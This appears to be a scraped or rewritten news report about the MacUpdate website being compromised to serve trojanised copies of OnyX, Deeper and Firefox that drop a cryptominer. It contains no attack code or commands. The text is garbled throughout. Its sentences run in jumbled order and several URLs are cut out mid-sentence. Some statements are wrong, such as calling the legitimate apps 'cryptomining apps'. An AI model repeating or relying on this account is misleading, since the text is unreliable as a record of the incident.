“This means the creation of these applications had a low bar for entry,” noted Abbati.ĭecoy copies of the authentic app are also present in the malware so that users don’t get suspicious. MacUpdate trojan/miner is a Platypus dropper downloading a miner from Adobe Creative Cloud servers. The applications have been created by Platypus, a developer tool that produces full macOS apps from various scripts like Python or Shell scripts. What happens is that the user is requested to store the app into the Applications folder, which is a common requirement even with the original apps. Conversely, the unauthentic Firefox app is being distributed through fake URL instead of. This new domain was registered on 23rd January but its owner is remained obscured. OnyX and Deeper are developed by Titanium Software, which can be accessed at, but the link has been maliciously altered as to redirect users to download URLs from this unauthentic address. According to Thomas Reed from Malwarebytes, the fake domains show URLs that were already modified but looked legit and convincing to users. They installed modified copies of the cryptomining apps OnyX, Firefox and Deeper and replaced the download links for each of these modified apps with links that led users to malicious domains. Cybercriminals apparently infiltrated the MacUpdate website to distribute the malware.